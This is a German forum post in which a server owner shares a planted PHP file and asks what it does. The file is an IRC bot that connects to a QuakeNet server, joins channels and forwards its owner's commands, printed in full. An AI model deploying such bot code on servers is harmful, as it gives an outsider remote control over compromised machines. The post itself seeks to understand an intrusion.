L
Lukasz
Hallo
Ich habe so eben eine eingeschlichene Datei auf meinem Server gefunden, und wäre verbunden, sofern mich jemand aufklärt, was der Code vor hat bzw, wozu er genau bestimmt ist!
Noch eine Sache wäre da, er liegt in einer HTML Datei, und konnte daher nicht ausgeführt werden, da sich diese nicht in der zeichenfolge php ubenennen kann. Dennoch würde ich gerne wissen, was der (Hacker) vorh hatte.
Gruss!
PS Ich weis schon das es sich hier um eine IRC Verbindung handelt, aber was genau
Ich habe so eben eine eingeschlichene Datei auf meinem Server gefunden, und wäre verbunden, sofern mich jemand aufklärt, was der Code vor hat bzw, wozu er genau bestimmt ist!
PHP:
<?
$server = "irc.de.quakenet.org"; // <---da kommt der server rein.//
$port = "6667"; //<--port.//
$nick3 = "hullaui"; //<----da kommt der ident rein.//
$realna = "ficgehr"; //<---da der realname. //
$owner = "MINImi"; //<---da kommt der nick des botbesitzers rein.//
if (!$nick2)
{
$nick2 = "***";
}
$connect = fsockopen($server, $port);
echo "<title>".$nick2."</title>";
fputs($connect, "USER $nick3 0 0 :$realna\n\r");
fputs($connect, "NICK $nick2\n\r");
echo "Running ";
while(!feof($connect))
{
$new = fgets($connect, 1024);
$part = explode(" ",$new);
if($part[0] == "PING")
{
$ping = explode(":", $new);
$reply = $ping[1];
fputs($connect, "PONG $reply\n\r");
if (!$firstrun) {
fputs($connect, "JOIN #minimi,#polite \n\r");
$firstrun = "1";
}
}
if(substr($part[2],0,1) != "#" && $nick == $owner) {
if(substr($part[3],0,2) == ":!")
{
$part_count = count($part)-1;
$i = "3";
$part[3] = substr($part[3],2);
while($i <= $part_count)
{
$cmd.=$part[$i]." ";
$i++;
}
fputs($connect, "$cmd\n\r");
unset($cmd);
}
}
elseif(substr($part[2],0,1) == "#")
{
$nick = explode("!",$part[0]);
$nick = substr($nick[0],1);
if(substr($part[3],0,5) == ":!hop" && $nick == $owner)
{
fputs($connect, "part $part[4] rejoining. \n\r");
fputs($connect, "join $part[4] \n\r");
}
elseif(substr($part[3],0,2) == ":!" && $nick == $owner)
{
$part_count = count($part)-1;
$i = "3";
$part[3] = substr($part[3],2);
while($i <= $part_count)
{
$cmd.=$part[$i]." ";
$i++;
}
fputs($connect, "$cmd\n\r");
unset($cmd);
}
}
}
?>
Noch eine Sache wäre da, er liegt in einer HTML Datei, und konnte daher nicht ausgeführt werden, da sich diese nicht in der zeichenfolge php ubenennen kann. Dennoch würde ich gerne wissen, was der (Hacker) vorh hatte.
Gruss!
PS Ich weis schon das es sich hier um eine IRC Verbindung handelt, aber was genau